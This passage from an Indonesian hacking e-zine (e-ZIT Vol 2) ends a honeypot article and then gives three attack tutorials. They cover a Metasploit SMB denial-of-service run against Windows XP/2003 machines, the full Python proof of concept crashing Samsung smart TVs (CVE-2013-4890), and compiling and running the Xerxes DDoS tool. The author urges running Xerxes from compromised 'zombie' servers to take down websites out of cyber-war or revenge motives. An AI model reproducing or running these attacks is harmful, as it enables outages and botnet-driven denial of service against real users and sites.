Internal Placement, honeypot tidak terkoneksi langsung ke internet tetapi berada di antara firewall dan koneksi internet.
56. e-ZIT #Vol 2 - Networking 56
DMZ Placement, honeypot diposisikan dalam firewall DMZ (demilitarized zone). Biasanya digunakan pada sebuah perusahaan besar dengan sistem jaringan yang besar.
Sumber :
Seminar Security Jaringan (khususnya pembicaranya, lupa namanya, tapi senyumnya… MANTAB )
NeoTek Vol. V – No. 1
Referensi > http://bisnistypeapproval.wordpress.com/2009/05/01/jaringan-honeypot/
Yarp, gemana ? udah pada tau “Apa Itu Honeypot” kan, tertarik untuk mencobanya atau menerapkannya ?
Kalo udah di coba jangan lupa di share yah…..
Special Thank.z To > Keygen, Surtua, Gunners, Thektor, Rulex, Error and All Crew ZIT Networking Division
./regards
e-ZIT
57. e-ZIT #Vol 2 - Networking 57
Network Attack > DoS Attack With Metasploit
Hai-Hai . . . Salam Bcktrackers Jumpa lagi sama saya Bifi yang Cool . . . wkwkw
Yups, kali Bifi mau share neh, sesuai kayak judul di atas, DOS With Metasploit, buat yang biasa jadi penjahat di komputer pasti udah tau kan apa itu metasploit...
ok neh penjelasannya
DoS (Denial of Service) > adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang Țersebut..
Metasploit > Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem... sekian thread saya, makasih,,, wkwkwkw eh belum belum,,,
lanjoot,, Okok,, Sebelum Melakukan Aksi Kali Ini, Mending Kita Liad Persyaratannya Dolo... neh,
DoS hanya bisa dilakukan ke Seri Windows yang tertera dibawah.
Windows 7 dan Vista dan Windows 8 belum/tidak bisa.
Code :
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Profesional SP2 Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Media Center Edition SP1 Microsoft Windows XP Media Center Edition Microsoft Windows XP Home SP2 Microsoft Windows XP Home SP1 Microsoft Windows XP Home Microsoft Windows XP Emas 0 Microsoft Windows XP Embedded SP1 Microsoft Windows XP Embedded Microsoft Windows XP 64-bit Edition Versi 2003 SP1
58. e-ZIT #Vol 2 - Networking 58
Microsoft Windows XP 64-bit Edition 2003 Versi Microsoft Windows XP 64-bit Edition SP1 Microsoft Windows XP 64-bit Microsoft Windows XP 0 Microsoft Windows Server 2003 Web Edition SP1 Beta 1 Microsoft Windows Server 2003 Web Edition SP1 Microsoft Windows Server 2003 Web Edition Microsoft Windows Server 2003 Standard x64 Edition Microsoft Windows Server 2003 Standard Edition SP1 Beta 1 Microsoft Windows Server 2003 Standard Edition SP1 Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise x64 Edition Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium Microsoft Windows Server 2003 Enterprise Edition Itanium 0 Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Microsoft Windows Server 2003 Enterprise Edition SP1 Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter x64 Edition Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium Microsoft Windows Server 2003 Datacenter Edition Itanium 0 Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Edition SP1 Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows 2000 Server SP4 Microsoft Windows 2000 SP4 Professional Microsoft Windows 2000 Datacenter Server SP4 Microsoft Windows 2000 Advanced Server SP4
siapkan alat dan bahan... 1. Sebuah PC/Laptop Yang Udah Terkoneksi 2. Nmap Untuk Scan Traget 3. Metasploit 4. Korban Nb > Ini Hanya bisa di lakukan pada 1 jaringan yang sama . . . alias ngana baconnect di situ, korban juga di situ kabawa... step 1... scan target with nmap doloo, Scan dengan nmap, untuk cari tau OS Korban n cari yang port 445 yang terbuka... kayak gini
59. e-ZIT #Vol 2 - Networking 59
commandnya ada disini, http://forum.codernate.org/thread-331.html silahkan di coba.. Ingat, OSnya Harus Cocok Kayak Daftar Yang Di Atas... klo udah dapet ip korbannya, langsung aja deh buka tools metasploitnya,, ne letak toolsnya klik ikon backtrack lalu pilih, backtrack > explotation > network explotation tools > metasploit framework > klik msfconsole setelah di consolenya ketik perintah berikut
Code:
- msf > use dos/windows/smb/ms06_063_trans - msf auxiliary(ms06_063_trans) > set LPORT 445 # setting port ke 445 - msf auxiliary(ms06_063_trans) > set RHOST IP_TARGET # ip address target bro - msf auxiliary(ms06_063_trans) > run
60. e-ZIT #Vol 2 - Networking 60
kayak gini
kalo udah maka hasilnya akan seperti ini, kebetulan temen Bifi setelah di bujuk dengan Big Cola 1 botol dia mau jadi korbannya,, kasian...
61. e-ZIT #Vol 2 - Networking 61
neh hasilnya, langsung di capture . . .
Yap, target langsung mengalami bluescreen :) nah gitu aja... ne thread Bifi specialin buat temen Bifi yang gak mau disebut namanya, thank.z zob udah mau laptopnya dijadiin korban,,, n buat yang make OS untuk Hacking or Hoby ngumpul tools hacking, di pake toolsnya bukan di jadiin hiasan . . . Terakhir Jangan Males googling Yah... referensi > forum.id-backtrack.com
./regards
Bifi
62. e-ZIT #Vol 2 - Networking 62
Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack
Yups, setelah beberapa bulan miskin thread, akhirnya dapat juga,,, berawal dari searching-searching di mbah gugel, eh nemu juga... wkwkw, seperti judul di atas, kali ini bifi mau kasih tau POCnya, Step 1... Copas script python dibawah ini...
Code:
#!/usr/bin/python # Exploit Title: Samsung TV Denial of Service (DoS) Attack # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com # Date: 07/21/2013 # CVE Number: CVE-2013-4890 # Vendor Homepage: http://www.samsung.com # Description: # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request # As a results, the TV reboots... # Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) import httplib import sys import os print " ************************************************************************ ***************" print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.comn" print " Exploit: Denial of Service (DoS) attackn" print " Description:n" print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request." print " Tested successfully on my Samsung PS50C7700 plasma TV :)n" print " ************************************************************************ ***************n" # Sends the payload print " Sending the malicious payload...n" conn = httplib.HTTPConnection(sys.argv[1],5600) conn.request("GET", "A"*300) conn.close() # Checks the response print " Checking the status... (CTRL+Z to stop)n" response = 0 while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!n"
63. e-ZIT #Vol 2 - Networking 63
Atau ambil saja disini http://www.exploit-db.com/exploits/27043/
save dengan extensi .py .. terserah namanya apa, bifi.py kek, gula.py kek,,, whatever you want bro.... jangan lupa beri file permissionnya dulu ketik chmod +x namafile.py + enter contoh : root@bifi:~# chmod +x gula-gula.py #Step 2 Usahakan kita berada dalam 1 jaringan yang sama,, dalam hal ini masih via LAN untuk versi WiFi bifi masih belum paham a.k.a masih di cari POC nya,,,, yarp kalo udah scan dulu IP Target bisa make NMAP or apalah,,,, setelah target di dapat,,, misalkan IP targetnya 200.100.1.22, nah tinggal jalankan scriptnya.... #Step 3 untuk jalankan scriptnya, cukup open terminal masuk ke directory script.py yang tadi kita udah simpan, lalu ketik ./namascript.py IP_TARGET contoh : root@bifi:~# ./gula-gula.py 200.100.1.22 + enter daaaan, tango down,, check dengan ping IP Target, jika uncreable/timeout berarti target down,,,,, Nah mengapa target down,,,??? itu terjadi karena port TCP/5600 pada Samsung Smart TV tersebut mengalami crash, karena script tersebut mengirim "HTTP GET request" yang panjang atau sangat banyak.. sehingga TV dipaksa untuk restart a.k.a reboot... neh fungsi yang membuat port tersebut crash
Code:
conn = httplib.HTTPConnection(sys.argv[1],5600)
yups mungkin itulah sedikit POC dari cara DoS Samsung TV,,,, Script ini masih work di segala jenis SAMSUNG SMART TV.....
Tested On : Samsung plasms TV PS50C7700.
64. e-ZIT #Vol 2 - Networking 64
nah next thread nanti Bifi akan jelaskan POC untuk mendapatkan full access remote pada SAMSUNG SMART TV, hingga kita bisa memantau semua aktivitas pemilik TV tersebut alias "we keep the eyes and ears in the living room" TO BE CONTINUED Referensi http://www.exploit-db.com/exploits/27043/ http://www.infosecurity.com http://securityaffairs.co http://www.youtube.com/watch?v=U-R2epNnU...r_embedded Special Thanks To Ivan Tabrakan Untuk Kuotanya and My Brother Ical yang udah menjadi penerjemah, hahahaha gak perlu buka gugel translate lagi kan udah ada ical translate
./regards
Bifi
65. e-ZIT #Vol 2 - Networking 65
Network Attack > How To Use Xerxes DDoS Tools
Yups Malam Semuanya,,
jumpa lagi sama saya Bifi yang aneh dan gemana gitu...
okok, bagi kaka-kaka para peserta #OP atau yang suka ngikutin perang cyber, entah demi membela negara, agama, atau memang dendam sama website target, yups sesuai judul diatas kali ini Bifi mau share tentang cara penggunaan Xerxes DDoS Tool,, nah yang belum tau tentang tools yang 1 ini, neh Bifi kasih tau Xerxes itu nama toolsnya wkwkwkkw, yup isinya berupa script-script gak masuk akal make bahasa C, nah tools ini digunakan oleh Th3 J3st3r untuk takedown situs-situs yang jadi target mereka....
nah kenapa Bifi jadiin ini thread karena, Bifi Udah puyeng nyari tutornya di mbah gugel tapi nggak ketemu cara gunain tuh tools, yang ada hanya scriptnya doang,,,,
okeh langsung aja yah, pertama kita donlod atau copas dulu scriptnya disini
http://pastebin.com/aWZMbjSU next,, kalo udah, ganti extensinya dengan "C" contoh xerxes.txt ganti dengan xerxes.c atau kalo di copas langsung aja save dengan extensi "c" nya contoh xerxes.c...
yup untuk ngejalaninnya kita harus compile dulu scriptnya,
kalo dilinux nama compilernya g++, itu loh compilernya bahasa C, kalo nggak salah,, dan kalo
belum punya langsung di install aja sekalian, neh comandnya..
sudo apt-get install g++
lanjood,, nah cara compilenya [untuk linux] gini open terminal ketik g++ namafile -o nama output
filenya contoh : g++ xerxes.c -o xerxes
kalo untuk windows pake Turbo C, cuman Bifi belum tau cara make nya...
siip, setelah di compile jalankan scriptnya,
masih di terminal linux, ketik ./nama toolsnya [IP Target] [Port]
contoh : ./xerxes 200.100.1.1 80 lalu tekan enter,,, siip tinggal tunggu aja ampe targetnya
mampus...
66. e-ZIT #Vol 2 - Networking 66
nb > bagusnya bandwith kaka dewo, biar nggak jadi senjata makan tuan,, dan untuk penggunaan yang lebih memuaskan a.k.a mematikan, mending ne script di taruh di zombie-
zombienya agan, trus di execute, apalagi kalo punya zombie di server-server negara besar yang mempunyai speed inet dewo, makin ampuh deh,,,,,,
nah sekian tutorial Bifi, Salam Backtrackers
Gretz To > All Codernate | ZIT Crew
referensi :
http://www.google.com http://www.securitytube.net
./regards
Bifi
67. e-ZIT #Vol 2 - Networking 67
ZIT Product & Info
Codernate Linux 1.4 (Dodorobe) Released!!!
Versi : Codernate Linux 1.4 Dodorobe
Tanggal Rilis : 13 Januari 2014
Pengguna : Beginers s/d Expert
Ukuran : 2.14 GB
Codernate Linux merupakan Sistem Operasi Berbasis Open Source (Linux) yang merupakan Turunan dari Ubuntu 10.04 yang di kembangkan oleh Komunitas Zona IT Ternate.
Codernate Linux sendiri di modifikasi khusus untuk penetrasi jaringan, dan kurang lebih terdapat sekitar 150 tool penetrasi yang filenya terdapat pada folder /pentest, dan langsung bisa di eksekusi lewat menu Codernate.
68. e-ZIT #Vol 2 - Networking 68
Dan setelah mengalami beberapa perbaikan pada bug dan tools, akhirnya Codernate Linux 1. 4 dengan Codename "Dodorobe" dengan bangga kami lepas ke publik. pada versi yang kali ini masih sama seperti pada versi sebelumnya, yaitu masih tetap pada penetrasi jaringan, hanya saja untuk yang versi ke 4 ini sudah ada sedikit penambahan beberapa tools dll.
Bagi Teman-teman yang ingin langsung mencobanya bisa langsung download di link berikut...
http://apps.e-zit.com/Codernate_Linux_1.4_dodorobe_v.iso << Dodorebe
untuk yang pengen coba versi sebelumnya [Codernate Cacarlak], bias juga di download di link dibwah ini
http://apps.e-zit.com/Codernate_Linux_1.3_cacarlak_v.iso << Cacarlak
./regards
e-ZIT
69. e-ZIT #Vol 2 - Networking 69
Credits
Cara Kirim Artikel Di e-ZIT edisi berikutnya
Isi materi artikel:
Programing
Networking
Operating System
Design & Art
Hacking
Catatan: Artikel diharapkan sudah di post sebelumnya di www.forum.codernate.org, jika materi hasil copas, harap di sertakan link referensinya, artikel yang masuk akan di seleksi terlebih dahulu oleh redaksi e-ZIT.
Redaksi
Website : www.e-zit.com
Layouter : e-ZIT
Editor : e-ZIT
Cover : Bifi
Grets To : JMozac, Feenx_0, Mavis Vermilion, shockw4f3, Surtua, r8punkz3l, Bifi n All Staff Zona IT Ternate